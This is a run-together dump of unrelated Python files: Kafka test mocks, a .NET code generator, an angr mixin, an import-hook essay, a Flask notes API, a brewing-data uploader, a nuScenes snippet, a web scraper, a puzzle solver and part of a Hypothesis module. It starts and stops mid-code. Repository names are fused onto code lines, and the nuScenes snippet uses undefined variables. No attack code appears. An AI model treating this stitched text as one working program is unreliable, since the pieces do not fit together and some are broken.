'PuntiVendita', }, ), ] import logging from contextlib import contextmanager import json import pickle import random from functools import wraps from unittest.mock import patch from kafka.consumer.fetcher import ConsumerRecord from kafka import ( KafkaClient, KafkaConsumer, ) from kafka.protocol.message import Message from kafka.structs import TopicPartition from django.utils.functional import cached_property from django.utils.timezone import ( datetime, utc, ) from kafka_consumer.subscribers.base import BaseSubscriber from kafka_consumer.messages import BaseMessageProcessor from kafka_consumer.exceptions import ErrorMessageReceiverProcess def fake_generic_message(dt=datetime.now(tz=utc), name=0, data=None): """Generate fake message value""" timestamp = int((dt - datetime(1970, 1, 1, tzinfo=utc)).total_seconds() * 1000) return { "name": name, "time": timestamp, "data": data, } def fake_message_value(dt=datetime.now(tz=utc), name=0, data={}): """Generate fake message value, params see fake_generic_message""" return fake_generic_message(dt, name, data) def stringify_message_value(value): """Stringify message value""" return json.dumps(value).encode('utf-8') def fake_raw_message(value): """Make fake raw message""" return stringify_message_value(value) def create_kafka_message(value): """Create message with packed value""" return Message(value) def kafka_client_init(self, *args, **kwargs): # pylint: disable=unused-argument """Mocked KafkaClient __init__ method :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict """ pass def kafka_client_close(self, *args, **kwargs): # pylint: disable=unused-argument """Mocked KafkaClient close method :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict """ pass def kafka_consumer_poll(self, max_records=None, *args, **kwargs): # pylint: disable=unused-argument """Mocked KafkaConsumer kafka_consumer_poll method :param self: KafkaConsumer instance :param max_records: maximal numbers of records in batch. :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict :return: dict of messages """ if max_records is None: result = self.messages self.messages = [] else: result = self.messages[:max_records] self.messages = self.messages[max_records:] result = {(TopicPartition("test_topic", 0)): result} return result def kafka_consumer_close(*args): """Mocked KafkaConsumer kafka_consumer_close method :param self: KafkaConsumer instance """ pass def kafka_consumer_partitions_for_topic(self, topic): """Mock KafkaConsumer partitions_for_topic method Arguments: topic (str): Topic to check. Returns: set: Partition ids """ return {0, 1, 2, 3, 4} def kafka_consumer_end_offsets(self, partitions): """Mock KafkaConsumer end_offsets method Arguments: partitions (list): List of TopicPartition instances to fetch offsets for. Returns: ``{TopicPartition: int}``: The end offsets for the given partitions. Raises: UnsupportedVersionError: If the broker does not support looking up the offsets by timestamp. KafkaTimeoutError: If fetch failed in request_timeout_ms """ return self.offsets def kafka_consumer_seek(self, partition, offset): """Mock KafkaConsumer seek method Arguments: partition (TopicPartition): Partition for seek operation offset (int): Message offset in partition Raises: AssertionError: If offset is not an int >= 0; or if partition is not currently assigned. """ try: self.offsets[partition] = offset except Exception: raise AssertionError def mock_kafka_server(messages_values=None): """A decorator that mock kafka server :param messages_values: list of message values to be returned by mocked server :type messages_values: list :return: the decorator :rtype: 'types.FunctionType' """ def decorator(func=None): """The decorated function to be returned :param func: the function that is decorated :type func: `types.FunctionType` """ @wraps(func) def wrapper(*args, **kwargs): """Patch KafkaClient and SimpleConsumer methods before executing the function :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict """ def kafka_consumer_init(self, *args, **kwargs): # pylint: disable=unused-argument """Mocked KafkaConsumer __init__ method Create sample messages based on given messages values that will be return in kafka_get_messages :param args: positional arguments of the functions that is decorated :type args: list :param kwargs: keyword arguments of the functions that is decorated :type kwargs: dict """ self.messages = [ConsumerRecord("test_topic", 0, i + 16123456, None, None, None, create_kafka_message(value), None, None, None) for i, value in enumerate(messages_values or [])] self.offsets = {TopicPartition("test_topic", i): random.randint(10, 1200) for i in range(5)} with patch.object(KafkaClient, '__init__', kafka_client_init),\ patch.object(KafkaClient, 'close', kafka_client_close),\ patch.object(KafkaConsumer, '__init__', kafka_consumer_init),\ patch.object(KafkaConsumer, 'poll', kafka_consumer_poll),\ patch.object(KafkaConsumer, 'partitions_for_topic', kafka_consumer_partitions_for_topic),\ patch.object(KafkaConsumer, 'end_offsets', kafka_consumer_end_offsets),\ patch.object(KafkaConsumer, 'seek', kafka_consumer_seek),\ patch.object(KafkaConsumer, 'close', kafka_consumer_close): return func(*args, **kwargs) return wrapper return decorator @contextmanager def enabled_logging(): """Ensure logging is enabled.""" initial_level = logging.root.manager.disable logging.disable(logging.NOTSET) try: yield finally: logging.disable(initial_level) class TestableBaseSubscriber(BaseSubscriber): def _handle(self, message): pass def _should_process_message(self, message): return True class ClumsySubscriber(BaseSubscriber): def _handle(self, message): pass def _should_process_message(self, message): raise ErrorMessageReceiverProcess('Ups, I did it again') class FaddySubscriber(BaseSubscriber): # Wybredny, kapryśny def _handle(self, message): pass def _should_process_message(self, message): return False class JsonMessageProcessor(BaseMessageProcessor): """Simple processor for purely JSON messages.""" @cached_property def _parsed_kafka_message(self) -> dict: """Method to parse raw data from kafka message :rtype: dict :raises: BadMessageValue """ return json.loads(self._kafka_message) def get_type(self): return self._parsed_kafka_message['name'] def get_time(self): return self._parsed_kafka_message['time'] def get_data(self): return self._parsed_kafka_message['data'] class PickleMessageProcessor(BaseMessageProcessor): """Processor for plain message. Raw data is given as dict of fields, which directly maps to Message without any decompression, deserialization, decryption stuff This class is provided for testing purpose """ def __init__(self, src_kafka_message, config_key=None): kafka_message = pickle.loads(src_kafka_message) super(PickleMessageProcessor, self).__init__(kafka_message, config_key) def get_type(self): return self._kafka_message['name'] def get_time(self): return self._kafka_message['time'] def get_data(self): return self._kafka_message['data'] class ClumsyMessageProcessor(PickleMessageProcessor): # - Ciamajda def __init__(self, *args, **kwargs): raise Exception('Ups, I did it again') Src/Scripts/generate_dynamic_instructions.py1000+ # Licensed to the .NET Foundation under one or more agreements. # The .NET Foundation licenses this file to you under the Apache 2.0 License. # See the LICENSE file in the project root for more information. import sys from generate import generate MAX_TYPES = 16 MAX_ARGS = 3 MAX_HELPERS = 7 TYPE_CODE_TYPES = ['Int16', 'Int32', 'Int64', 'Boolean', 'Char', 'Byte', 'Decimal', 'DateTime', 'Double', 'Single', 'UInt16', 'UInt32', 'UInt64', 'String', 'SByte'] def get_args(i): return ['arg' + str(x) for x in range(i)] def get_arr_args(i): return ['args[' + str(x) + ']' for x in range(i)] def get_object_args(i): return ['object arg' + str(x) for x in range(i)] def get_type_names(i): if i == 1: return ['T0'] return ['T' + str(x) for x in range(i)] def get_invoke_type_names(i): return get_type_names(i - 1) + ['TRet'] def get_cast_args(i): return ['(%s)%s' % (x[0], x[1]) for x in zip(get_type_names(i), get_args(i))] def get_type_params(i): if i == 0: return '' return '<' + ', '.join(get_type_names(i)) + '>' def gen_instruction(cw, n): type_names = get_type_names(n) class_type_params = ','.join(type_names + ['TRet']) func_type_params = ','.join(['CallSite'] + type_names + ['TRet']) func_type = 'Func<%s>' % func_type_params cw.enter_block('internal class DynamicInstruction<%s> : Instruction' % class_type_params) cw.write('private CallSite<%s> _site;' % func_type) cw.write('') cw.enter_block('public static Instruction Factory(CallSiteBinder binder)') cw.write('return new DynamicInstruction<%s>(CallSite<%s>.Create(binder));' % (class_type_params, func_type)) cw.exit_block() cw.write('') cw.enter_block('private DynamicInstruction(CallSite<%s> site)' % func_type) cw.write('_site = site;') cw.exit_block() cw.write('') cw.write('public override int ProducedStack { get { return 1; } }') cw.write('public override int ConsumedStack { get { return %d; } }' % n) cw.write('') gen_interpreted_run(cw, n) cw.write('') cw.enter_block('public override string ToString()') cw.write('return "Dynamic(" + _site.Binder.ToString() + ")";') cw.exit_block() cw.exit_block() cw.write('') def gen_interpreted_run(cw, n): cw.enter_block('public override int Run(InterpretedFrame frame)') args = '_site' for i in range(0, n): args += ', (T%d)frame.Data[frame.StackIndex - %d]' % (i, n - i) cw.write('frame.Data[frame.StackIndex - %d] = _site.Target(%s);' % (n, args))\ if n != 1: cw.write('frame.StackIndex -= %d;' % (n - 1)) cw.write('return 1;') cw.exit_block() def gen_types(cw): for i in range(MAX_TYPES): cw.write('case %d: genericType = typeof(DynamicInstruction<%s>); break;' % (i+1, ''.join([',']*i))) def gen_untyped(cw): for i in range(MAX_TYPES): cw.write('case %d: return DynamicInstruction<%s>.Factory(binder);' % (i, ', '.join(['object']*(i+1)))) def gen_instructions(cw): for i in range(MAX_TYPES): gen_instruction(cw, i) def gen_run_method(cw, n, is_void): type_params = ['T%d' % i for i in range(n)] param_names = ['T%d arg%d' % (i,i) for i in range(n)] if is_void: ret_type = 'void' name_extra = 'Void' else: ret_type = 'TRet' name_extra = '' type_params.append(ret_type) if type_params: types = '<' + ','.join(type_params) + '>' else: types = '' cw.enter_block('internal %s Run%s%d%s(%s)' % (ret_type, name_extra, n, types, ','.join(param_names))) cw.enter_block('if (_compiled != null || TryGetCompiled())') args = ', '.join(['arg%d' % i for i in range(n)]) if is_void: cw.write('((Action%s)_compiled)(%s);' % (types, args)) cw.write('return;') else: cw.write('return ((Func%s)_compiled)(%s);' % (types, args)) cw.exit_block() cw.write('') cw.write('var frame = MakeFrame();') for i in range(n): cw.write('frame.Data[%d] = arg%d;' % (i,i)) cw.write('var current = frame.Enter();') cw.write('try { _interpreter.Run(frame); } finally { frame.Leave(current); }') if not is_void: cw.write('return (TRet)frame.Pop();') cw.exit_block() cw.write('') def gen_run_maker(cw, n, is_void): type_params = ['T%d' % i for i in range(n)] if is_void: name_extra = 'Void' delegate_name = 'Action' else: type_params.append('TRet') name_extra = '' delegate_name = 'Func' if type_params: types = '<' + ','.join(type_params) + '>' else: types = '' cw.enter_block('internal static Delegate MakeRun%s%d%s(LightLambda lambda)' % (name_extra, n, types)) cw.write('return new %s%s(lambda.Run%s%d%s);' % (delegate_name, types, name_extra, n, types, )); cw.exit_block() def gen_run_methods(cw): cw.write('internal const int MaxParameters = %d;' % MAX_TYPES) for i in range(MAX_TYPES): gen_run_method(cw, i, False) gen_run_method(cw, i, True) gen_run_maker(cw, i, False) gen_run_maker(cw, i, True) def gen_instructionlist_factory(cw): for i in range(1, MAX_TYPES): gen_args = ', '.join(get_type_names(i)) cw.enter_block('public void EmitDynamic<%s, TRet>(CallSiteBinder binder)' % gen_args) cw.write('Emit(DynamicInstruction<%s, TRet>.Factory(binder));' % gen_args) cw.exit_block() cw.write('') def main(): return generate( ("Dynamic InstructionList Factory", gen_instructionlist_factory), ("LightLambda Run Methods", gen_run_methods), ("Dynamic Instructions", gen_instructions), ("Dynamic Instruction Types", gen_types), ("Untyped Dynamic Instructions", gen_untyped), ) if __name__ == "__main__": main() import pyvex from .heavy import HeavyVEXMixin from angr.state_plugins.sim_action import SimActionObject, SimActionData, SimActionExit, SimActionOperation from angr import sim_options as o class TrackActionsMixin(HeavyVEXMixin): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self.__tmp_deps = {} __tls = ('__tmp_deps',) def handle_vex_block(self, irsb): self.__tmp_deps = {} super().handle_vex_block(irsb) def _handle_vex_const(self, const): return super()._handle_vex_const(const), frozenset() def _handle_vex_expr_GSPTR(self, expr): return super()._handle_vex_expr_GSPTR(expr), frozenset() def _handle_vex_expr_VECRET(self, expr): return super()._handle_vex_expr_VECRET(expr), frozenset() def _handle_vex_expr_Binder(self, expr): return super()._handle_vex_expr_Binder(expr), frozenset() def _instrument_vex_expr(self, result): return super()._instrument_vex_expr(result[0]), result[1] def _perform_vex_expr_Op(self, op, args): exprs, deps = zip(*args) result = super()._perform_vex_expr_Op(op, exprs) if o.TRACK_OP_ACTIONS in self.state.options: action_objects = [SimActionObject(arg, deps=dep, state=self.state) for arg, dep in args] r = SimActionOperation(self.state, op, action_objects, result) self.state.history.add_action(r) result_deps = frozenset((r,)) else: result_deps = frozenset().union(*deps) return result, result_deps def _perform_vex_expr_ITE(self, *args): exprs, deps = zip(*args) combined_deps = frozenset().union(*deps) result = super()._perform_vex_expr_ITE(*exprs) return result, combined_deps # TODO for this and below: what if we made AUTO_DEPS work here? def _perform_vex_expr_CCall(self, func_name, ty, args, func=None): exprs, deps = zip(*args) combined_deps = frozenset().union(*deps) result = super()._perform_vex_expr_CCall(func_name, ty, exprs, func=None) return result, combined_deps def _perform_vex_stmt_Dirty_call(self, func_name, ty, args, func=None): exprs, deps = zip(*args) if args else ((), ()) combined_deps = frozenset().union(*deps) result = super()._perform_vex_stmt_Dirty_call(func_name, ty, exprs, func=None) return result, combined_deps def _perform_vex_expr_RdTmp(self, tmp): result = super()._perform_vex_expr_RdTmp(tmp) # finish it and save the tmp reference if o.TRACK_TMP_ACTIONS in self.state.options: r = SimActionData(self.state, SimActionData.TMP, SimActionData.READ, tmp=tmp, size=self.irsb.tyenv.sizeof(tmp), data=result) self.state.history.add_action(r) a = frozenset((r,)) else: a = self.__tmp_deps.get(tmp, frozenset()) return result, a def _perform_vex_expr_Get(self, offset_bundle, ty, **kwargs): offset, offset_deps = offset_bundle result = super()._perform_vex_expr_Get(offset, ty, **kwargs) if o.TRACK_REGISTER_ACTIONS in self.state.options: offset_ao = SimActionObject(offset, deps=offset_deps, state=self.state) r = SimActionData(self.state, self.state.registers.id, SimActionData.READ, addr=offset_ao, size=pyvex.get_type_size(ty), data=result ) self.state.history.add_action(r) a = frozenset((r,)) else: a = frozenset() return result, a def _perform_vex_expr_Load(self, addr_bundle, ty, end, **kwargs): addr, addr_deps = addr_bundle result = super()._perform_vex_expr_Load(addr, ty, end, **kwargs) if o.TRACK_MEMORY_ACTIONS in self.state.options: addr_ao = SimActionObject(addr, deps=addr_deps, state=self.state) r = SimActionData(self.state, self.state.memory.id, SimActionData.READ, addr=addr_ao, size=pyvex.get_type_size(ty), data=result) self.state.history.add_action(r) a = frozenset((r,)) else: a = frozenset() return result, a # statements def _perform_vex_stmt_WrTmp(self, tmp, data_bundle, **kwargs): data, data_deps = data_bundle if o.TRACK_TMP_ACTIONS not in self.state.options: self.__tmp_deps[tmp] = data_deps super()._perform_vex_stmt_WrTmp(tmp, data, deps=data_deps) def _perform_vex_stmt_Put(self, offset_bundle, data_bundle, **kwargs): offset, offset_deps = offset_bundle data, data_deps = data_bundle # track the put if o.TRACK_REGISTER_ACTIONS in self.state.options: data_ao = SimActionObject(data, deps=data_deps, state=self.state) size_ao = SimActionObject(len(data)) a = SimActionData(self.state, SimActionData.REG, SimActionData.WRITE, addr=offset, data=data_ao, size=size_ao) self.state.history.add_action(a) else: a = None super()._perform_vex_stmt_Put(offset, data, action=a, **kwargs) def _perform_vex_stmt_Store(self, addr_bundle, data_bundle, end, condition=None, **kwargs): addr, addr_deps = addr_bundle data, data_deps = data_bundle if condition is not None: condition, condition_deps = condition else: condition_deps = None # track the write if o.TRACK_MEMORY_ACTIONS in self.state.options and addr_deps is not None: data_ao = SimActionObject(data, deps=data_deps, state=self.state) addr_ao = SimActionObject(addr, deps=addr_deps, state=self.state) size_ao = SimActionObject(len(data)) cond_ao = SimActionObject(condition, deps=condition_deps, state=self.state) if condition_deps is not None else None a = SimActionData(self.state, SimActionData.MEM, SimActionData.WRITE, data=data_ao, size=size_ao, addr=addr_ao, condition=cond_ao) self.state.history.add_action(a) else: a = None super()._perform_vex_stmt_Store(addr, data, end, action=a, condition=condition, **kwargs) def _perform_vex_stmt_Exit(self, guard_bundle, target_bundle, jumpkind): guard, guard_deps = guard_bundle target, target_deps = target_bundle if o.TRACK_JMP_ACTIONS in self.state.options: guard_ao = SimActionObject(guard, deps=guard_deps, state=self.state) target_ao = SimActionObject(target, deps=target_deps, state=self.state) self.state.history.add_action(SimActionExit(self.state, target=target_ao, condition=guard_ao, exit_type=SimActionExit.CONDITIONAL)) super()._perform_vex_stmt_Exit(guard, target, jumpkind) def _perform_vex_defaultexit(self, target_bundle, jumpkind): if target_bundle is not None: target, target_deps = target_bundle if o.TRACK_JMP_ACTIONS in self.state.options: target_ao = SimActionObject(target, deps=target_deps, state=self.state) self.state.history.add_action(SimActionExit(self.state, target_ao, exit_type=SimActionExit.DEFAULT)) else: target = None super()._perform_vex_defaultexit(target, jumpkind) """ .. admonition:: Summary This example illustrates how one can change the indentation of an entire block of code, eliminate lines, and change the content much more drastically than what the previous examples have done. The idea behind this example is to help reduce the amount of typing required and increases readability when assigning attributes in a class's ``__init__()`` method. Auto self ========== Python is known for its concise and readable syntax. One exception about the concisiveness is the boiler plate code that has to be written when defining one's own class, especially if it has many attributes, like:: self.this_variable = this_variable self.that_variable = that_variable self.this_other_variable = this_other_variable self.foo = foo self.bar = bar self.baz = [] if baz is None else baz self.spam = bread + ham This leads people to ask on various forums, such as `this question on StackOverflow `_, how to do automatic assignment of attributes. The answers most often given are: - Don't do it; learn to live with the explicit ``self``. - Use a decorator, with various examples provided. As programmers create more classes, they find the need to add their own dunder methods, such as ``__eq__(self, other)``, ``__repr__(self)``, etc. Eventually, they might get annoyed enough at having to re-create these methods too often, with the occasional typo causing bugs that they jump with joy when discovering `attrs: Classes Without Boilerplate `_. Starting with Python 3.7, the standard library includes `dataclasses `_ which shares some similarity with ``attrs``. However, it does require to use type hints which, in my opinion, reduces readability; note that many programmers find that type hints increase readability. As a concrete example of using traditional Python notation and dataclasses, let's consider the code given in `PEP 557 `_ but reformatted with Black:: class Application: def __init__( self, name, requirements, constraints=None, path="", executable_links=None, executables_dir=(), ): self.name = name self.requirements = requirements self.constraints = {} if constraints is None else constraints self.path = path self.executable_links = [] if executable_links is None else executable_links self.executables_dir = executables_dir self.additional_items = [] From the same PEP document, this is the proposed code which gives the same initialization, but using the ``@dataclass`` decorator:: from dataclasses import dataclass @dataclass class Application: name: str requirements: List[Requirement] constraints: Dict[str, str] = field(default_factory=dict) path: str = '' executable_links: List[str] = field(default_factory=list) executable_dir: Tuple[str] = () additional_items: List[str] = field(init=False, default_factory=list) This code does more than simply initializing the variables, but I do not find it particularly readable. So, I was wondering if it might be possible to imagine a simpler syntax. ``auto_self`` is what I came up with. .. admonition:: That ship has sailed ... I realize that there is zero chance that the following syntax would be adopted, especially now that the ``dataclasses`` module has been added to the Python standard library. Still, you can try it out using ``auto_self`` hook. .. code-block:: python class Application: def __init__( self, name, requirements, constraints=None, path="", executable_links=None, executables_dir=(), ): self .= : name requirements constraints = {} if __ is None else __ path executable_links = [] if __ is None else __ executables_dir additional_items = [] Here, I am using a new operator, ``.=``, which is meant to represent the automatic assignment of a variable to the name that precedes it (``self`` in this example). I have seen this idea for such an operator before on **python-ideas** but never for introducing a code block as I do here. By design, any *dunder* (double underscore), ``__``, is taken to be equivalent to the variable being initialized. I chose a dunder instead of a single underscore ``_`` so that it could be used in a REPL without creating conflicts with the existing use of a single underscore in Python's REPL. I also find that it makes it more readable. Of course, one is not restricted to using ``self``, or having to use ``__`` everywhere. The following is completely equivalent - although I now find it less readable, having been used to seeing ``__`` as easy to scan placeholder:: class Application: def __init__( cls, name, requirements, constraints=None, path="", executable_links=None, executables_dir=(), ): cls .= : name requirements constraints = {} if constraints is None else constraints path executable_links = [] if __ is None else executable_links executables_dir cls.additional_items = [] .. warning:: Unlike ``@dataclass`` or ``attrs``, no additional method is created by ``auto_self``. """ from ideas import import_hook import token_utils def transform_source(source, **_kwargs): """Replaces code like:: self .= : a b c = this if __ == that else ___ by:: self.a = a self.b = b self.c = this if c == that else c """ new_tokens = [] auto_self_block = False self_name = "" indentation = 0 get_nb = token_utils.get_number get_first = token_utils.get_first get_first_index = token_utils.get_first_index for tokens in token_utils.get_lines(source): if auto_self_block: variable = get_first(tokens) if variable is not None: # None would mean an empty line var_name = variable.string block_indent = variable.start_col if block_indent > indentation: dedent = block_indent - indentation if get_nb(tokens) == 1: variable.string = f"{self_name}.{var_name} = {var_name}" tokens = token_utils.dedent(tokens, dedent) else: variable.string = f"{self_name}.{var_name}" for token in tokens: if token.string == "__": token.string = var_name tokens = token_utils.dedent(tokens, dedent) else: auto_self_block = False elif get_nb(tokens) == 4: index = get_first_index(tokens) if ( tokens[index].is_identifier() and tokens[index + 1] == "." and tokens[index + 2] == "=" and tokens[index + 1].end_col == tokens[index + 2].start_col and tokens[index + 3] == ":" ): self_name = tokens[index].string indentation = tokens[index].start_col auto_self_block = True continue new_tokens.extend(tokens) return token_utils.untokenize(new_tokens) def add_hook(**_kwargs): """Creates and adds the import hook in sys.meta_path""" hook = import_hook.create_hook( transform_source=transform_source, hook_name=__name__, ) return hook from flask import Flask, request, json, Response, Blueprint from flask_restx import Api, Resource, fields from flask_cors import CORS import os import src.data.database as db from src.data.model import Note app = Flask(__name__) blueprint = Blueprint('api', __name__, url_prefix='/docs') api = Api(app=app, version='1.0', title='Note Taking App', description='Python playground', blueprint=blueprint, doc='/docs', default_label='Note Taking Namespace', default='note-taking') app.register_blueprint(blueprint) ns = api.namespace('Note', description='Note APIs') model = api.model('Note', { 'note_id': fields.String(required=True, description="ID of the note.", help="Cannot be blank."), 'timestamp': fields.Integer(description="Note's timestamp.", help="UNIX epoch."), 'content': fields.String(description="The actual note.") }) if os.environ['FLASK_ENV'] == 'development': cors = CORS(app, resources={r"/api/*": {"origins": "*"}}) else: cors = CORS(app) app.config['CORS_HEADERS'] = 'Content-Type' def buildListResult(notes: list): final_notes = [] for note in notes: final_notes += [note.to_dict()] return Response(response=json.dumps(final_notes), status=200, mimetype="application/json") @api.route('/api/list') class ListNotes(Resource): """Shows a list of all notes""" @ns.doc('list_notes') # FIXME: auto marshal # @ns.marshal_list_with(model) @ns.response(200, "List of notes.") @ns.response(400, "'limit' parameter should be an integer.") @ns.response(404, "Notes not found.") @ns.param(name='limit', description='The maximum number of elements to return.') def get(self): limit_parameter = request.args.get('limit') if limit_parameter is not None: try: limit = int(limit_parameter) except ValueError: # throw 400 if limit is not an int. return "'limit' parameter should be an integer!", 400 else: limit = 50 notes = db.list_notes(limit) if notes is None or notes == []: return [], 404 else: return buildListResult(notes) @api.route('/api/get') class GetNote(Resource): """Gets a note""" @ns.doc('get_note') # FIXME: auto marshal # @ns.marshal_with(model) @ns.response(200, "The note.") @ns.response(400, "'id' parameter should not be empty.") @ns.response(404, "Note not found.") @ns.param(name='id', description='The note id to retrieve.') def get(self): id_parameter = request.args.get('id') if id_parameter is None or id_parameter == "": return "'id' parameter should not be empty!", 400 note = db.get_note(id_parameter) if note is None: return f"Note with id '{id_parameter}' not found.", 404 else: return Response(response=json.dumps(note.to_dict()), status=200, mimetype="application/json") @api.route('/api/delete') class DeleteNote(Resource): """Deletes a note""" @ns.doc('delete_note') @ns.response(200, "Success") @ns.response(400, "'id' parameter should not be empty.") @ns.param(name='id', description='The note id to delete.') def get(self): id_parameter = request.args.get('id') if id_parameter is None or id_parameter == "": return "'id' parameter should not be empty!", 400 db.delete_note(id_parameter) return 'OK', 200 @api.route('/api/save') class SaveNote(Resource): """Saves a note""" @ns.doc('save_note') @ns.expect(model) @ns.response(200, "Success") @ns.response(400, "Request body is empty.") def post(self): payload = request.get_json() if payload is None or payload == {}: return "'payload' should not be empty!", 400 note = Note(**payload) db.store_note(note) return 'OK', 200 if __name__ == '__main__': app.run(debug=True, port=8080) butschi/brewpi-father0 import json import requests brewpi_url = 'http://brewpi.local/socketmessage.php' brewfather_url = 'http://log.brewfather.net/brewpiless?id=XXXXXXXXXXXXXX' def get_brewdata(): response = requests.post( brewpi_url, data={'messageType': 'getTemperatures'} ) if response.status_code == 200: return json.loads(response.content.decode('utf-8')) else: return None def post_brewdata(data): response = requests.post( brewfather_url, data=json.dumps(data), headers={'Content-Type': 'application/json'} ) if response.status_code == 200: return json.loads(response.content.decode('utf-8')) else: print(response) return None def map_brewdata(data): return dict( id='1', fridgeSet=data.get('FridgeSet'), beerTemp=data.get('BeerTemp'), beerSet=data.get('BeerSet'), fridgeTemp=data.get('FridgeTemp') ) brewdata = get_brewdata() if brewdata is not None: print("Current temperatures: ") print(brewdata) result = post_brewdata(map_brewdata(brewdata)) print(result) else: print('[!] Request Failed') from nuscenes.prediction.models.backbone import ResNetBackbone from nuscenes.prediction.models.mtp import MTP from nuscenes.prediction.models.covernet import CoverNet from nuscenes.prediction.input_representation.static_layers import StaticLayerRasterizer from nuscenes.prediction.input_representation.agents import AgentBoxesWithFadedHistory from nuscenes.prediction.input_representation.combinators import Rasterizer from nuscenes.prediction.input_representation.interface import InputRepresentation from nuscenes import NuScenes import matplotlib.pyplot as plt import torch DATAROOT = '/data/sets/nuscenes' nuscenes = NuScenes('v1.0-mini', dataroot=DATAROOT) # Data Splits for the Prediction Challenge # input representation static_layer_rasterizer = StaticLayerRasterizer(helper) agent_rasterizer = AgentBoxesWithFadedHistory(helper, seconds_of_history) mtp_input_representation = InputRepresentation(static_layer_rasterizer, agent_rasterizer, Rasterizer()) instance_token_img, sample_token_img = '', '7626dde27d604ac28a0240bdd54eba7a' anns = [ann for ann in nuscenes.sample_annotation if ann['instance_token'] == instance_token_img] img = mtp_input_representation.make_input_representation(instance_token_img, sample_token_img) plt.imshow(img) # Model Implementations import re from .utils import get_website_content, write_to_file from bs4 import BeautifulSoup import inquirer import pandas as pd choices = [ "Page title", "Headings and Subheadings", "All paragraphs", "Links", "Images", "Tables", "All text from page", "Whole source code" ] questions = [ inquirer.Text("site", message="Which site do you want to scrape"), inquirer.List( "parse_object", message="Which object do you want to parse", choices=choices ), inquirer.Confirm("write_to_file", message="Should the output be written to file", default=False) ] answers = inquirer.prompt(questions) # Get the site's content site = "https://" + answers["site"] if not answers["site"].startswith("https://") else answers["site"] content = get_website_content(site) # Create the soup soup = BeautifulSoup(content, "lxml") # Match the choices choice = answers["parse_object"] file_write = answers["write_to_file"] if choice == choices[0]: title = soup.find("title") if not title: print("No page title detected.") elif file_write: write_to_file(title.text, "title.txt") else: print(title.text) elif choice == choices[1]: headings = soup.find_all(["h1", "h2", "h3"]) if not headings or len(headings) == 0: print("No headings found!") else: headings = [heading.text for heading in headings] if file_write: write_to_file("\n".join(headings), "headings.txt") else: print("\n".join(headings)) elif choice == choices[2]: paragraphs = soup.find_all("p") if not paragraphs or len(paragraphs) == 0: print("No paragraphs found!") else: paragraphs = [ paragraph.text.replace("\n", "").strip() for paragraph in paragraphs ] if file_write: write_to_file("\n".join(paragraphs), "paragraphs.txt") else: print("\n".join(paragraphs)) elif choice == choices[3]: links = soup.find_all("a") if not links or len(links) == 0: print("No links found!") else: links = [str((link["href"], link.text)) for link in soup.find_all("a")] if file_write: write_to_file("\n".join(links), "links.txt") else: print("\n".join(links)) elif choice == choices[4]: images = soup.find_all("img") if not images or len(images) == 0: print("No images found!") else: images = [image["src"] for image in images] if file_write: write_to_file("\n".join(images), "image_urls.txt") else: print("\n".join(images)) elif choice == choices[5]: tables = soup.find_all("table") if not tables or len(tables) == 0: print("No table found!") else: table_list = [] for index, table in enumerate(tables): table_list.append([]) body = table.find_all("tr") head = body[0] body_rows = body[1:] table_list[index].append(tuple([ item.text.rstrip("\n") for item in head.find_all("th") ])) for row_num in range(len(body_rows)): row = [] for row_item in body_rows[row_num].find_all("td"): aa = re.sub("(\xa0)|(\n)|,", "", row_item.text) row.append(aa) table_list[index].append(tuple(row)) for index, table in enumerate(table_list): table = pd.DataFrame(table[1:], columns=table[0]) print(f"Table #{index + 1}\n{table}\n") elif choice == choices[6]: complete_text = soup.get_text() if file_write: write_to_file(complete_text, "page_content.txt") else: print(complete_text) else: code = soup.prettify() if file_write: write_to_file(code, "index.html") else: print(code) 0 from parse import parse with open('Day13/input.txt') as f: data = [value.rstrip() for value in f.readlines()] dots = {tuple(parse('{:d},{:d}', d)) for d in data[:data.index('')]} instructions = [tuple(parse('fold along {}={:d}', d)) for d in data[data.index('')+1:]] def fold(dots, axis, line): new_dot = [0, 0] if axis == 'x': i = 0 else: i = 1 for dot in list(filter(lambda x: x[i] > line, dots)): dots.remove(dot) new_dot[i] = 2*line - dot[i] new_dot[1-i] = dot[i-1] dots.add(tuple(new_dot)) def show_paper(dots): width = max(dots, key=lambda x: x[0])[0] height = max(dots, key=lambda x: x[1])[1] for y in range(height+1): print( ('').join(['x' if (x, y) in dots else ' ' for x in range(width+1)])) for instruction in instructions: fold(dots, *instruction) show_paper(dots) # coding=utf-8 # # This file is part of Hypothesis (https://github.com/DRMacIver/hypothesis) # # Most of this work is copyright (C) 2013-2015 # (), but it contains contributions by others. See # https://github.com/DRMacIver/hypothesis/blob/master/CONTRIBUTING.rst for a # full list of people who may hold copyright, and consult the git log if you # need to determine who owns an individual contribution. # # This Source Code Form is subject to the terms of the Mozilla Public License, # v. 2.0. If a copy of the MPL was not distributed with this file, You can # obtain one at http://mozilla.org/MPL/2.0/. # # END HEADER from __future__ import division, print_function, absolute_import import math import struct from decimal import Decimal from hypothesis.errors import InvalidArgument from hypothesis.control import assume from hypothesis.searchstrategy import SearchStrategy from hypothesis.internal.compat import ArgSpec, text_type, getargspec, \ integer_types, float_to_decimal from hypothesis.internal.reflection import proxies from hypothesis.searchstrategy.reprwrapper import ReprWrapperStrategy __all__ = [ 'just', 'one_of', 'none', 'choices', 'booleans', 'integers', 'floats', 'complex_numbers', 'fractions', 'decimals', 'characters', 'text', 'binary', 'tuples', 'lists', 'sets', 'frozensets', 'dictionaries', 'fixed_dictionaries', 'sampled_from', 'builds', 'randoms', 'random_module', 'streaming', 'recursive', 'composite', ] class FloatKey(object): def __init__(self, f): self.value = float_to_int(f) def __eq__(self, other): return isinstance(other, FloatKey) and ( other.value == self.value ) def __ne__(self, other): return not self.__eq__(other) def __hash__(self): return hash(self.value) def convert_value(v): if isinstance(v, float): return FloatKey(v) return (type(v), v) def cacheable(fn): import weakref cache = weakref.WeakValueDictionary() @proxies(fn) def cached_strategy(*args, **kwargs): kwargs_cache_key = set() try: for k, v in kwargs.items(): kwargs_cache_key.add((k, convert_value(v))) except TypeError: return fn(*args, **kwargs) cache_key = ( tuple(map(convert_value, args)), frozenset(kwargs_cache_key)) try: return cache[cache_key] except TypeError: return fn(*args, **kwargs) except KeyError: result = 